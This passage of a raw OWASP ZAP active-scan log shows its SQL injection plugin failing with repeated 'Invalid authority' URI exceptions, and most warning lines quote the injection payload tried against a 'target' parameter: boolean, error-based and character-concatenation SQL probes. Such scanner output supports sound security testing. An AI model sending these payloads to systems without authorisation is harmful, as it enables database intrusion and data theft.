org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6567=6567) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1236=1236) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683447 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9683733 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9684341 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9684495 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9684729 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3594=5169) THEN 3594 ELSE 3594*(SELECT 3594 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684732 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (4915=4915) THEN 4915 ELSE 4915*(SELECT 4915 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684734 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3594=5169) THEN 3594 ELSE 3594*(SELECT 3594 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684794 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 6146 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6146=6146,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684796 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8386=8386,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684797 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1145=1145) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9684800 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9796=9796) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685157 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9685230 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9685303 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 6973=2395 AND (7586=7586] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685304 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 8835=8835 AND (5709=5709] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685306 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 6973=2395 AND (7586=7586] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 4240=8352] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685309 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 2415=2415] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685310 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 4240=8352] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685311 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 3206=7659 AND ('oDjw'='oDjw] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685312 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 3452=3452 AND ('CGdr'='CGdr] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 